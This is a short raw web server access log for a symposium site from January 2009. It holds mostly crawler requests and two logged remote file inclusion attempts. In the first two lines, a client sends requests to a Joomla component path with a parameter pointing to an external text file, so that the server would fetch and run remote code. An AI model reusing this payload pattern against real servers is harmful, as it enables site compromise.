213.91.246.64 - - [24/Jan/2009:09:28:29 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.shelbyminitrucks.com/dlk/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" 0 www.geil-symposium.com
213.91.246.64 - - [24/Jan/2009:09:28:30 -0500] "GET /logs/error.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.shelbyminitrucks.com/dlk/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" 0 www.geil-symposium.com
203.209.252.10 - - [24/Jan/2009:13:11:16 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
202.160.178.101 - - [24/Jan/2009:13:11:17 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
208.111.154.16 - - [24/Jan/2009:13:57:52 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
